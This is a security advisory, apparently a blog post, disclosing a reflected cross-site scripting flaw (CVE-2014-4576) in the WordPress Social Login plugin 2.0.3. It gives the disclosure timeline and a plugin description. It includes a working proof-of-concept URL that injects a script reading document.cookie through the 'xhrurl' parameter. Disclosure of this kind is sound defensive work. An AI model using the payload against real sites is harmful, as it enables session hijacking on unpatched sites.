wp-plugin : wordpress-social-login – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wordpress-social-login

 

Effected Version : 2.0.3 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/wordpresssociallogin/services/diagnostics.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4576

 
Plugin Description :
 
Using WordPress Social Login, your blog's users will be able to login and comment with social networks such as Twitter, Facebook, Google and Yahoo.

WordPress Social Login also allows you to import users contact list from Google Gmail, Facebook, Windows Live and LinkedIn.

WordPress Social Login gives you absolute control over users access to your website and comes with a painfully long list of rules and restrictions for you to setup.

Free, unlimited and white-label 
Licenced under MIT License, WordPress Social Login available to everyone for completely free, with all features included, at absolutely no cost. You are free to use a WordPress Social Login in commercial websites as long as the copyright header is left intact. Built on top of an Open Source Library
HybridAuth Library enable developers to easily build social applications to engage websites vistors and customers on a social level by implementing social signin, social sharing, users profiles, friends list, activities stream, status updates and more. 23 supported social netwroks
Depending on the audience you're targeting, you can choose from a wide variety of providers and services including: Social networks, Microblogging platforms, Professional networks, Media, Photo sharing, Programmers and Gamers networks. Easy to customize and integrate
WordPress Social Login come with a simple but flexible and fully customizable authentication widget. And if you are a developer or designer then you can customize it to your heart's content, changing the css and icons is a matter of seconds. Even more features are planned
The coming release

Leave a Reply

Your email address will not be published. Required fields are marked *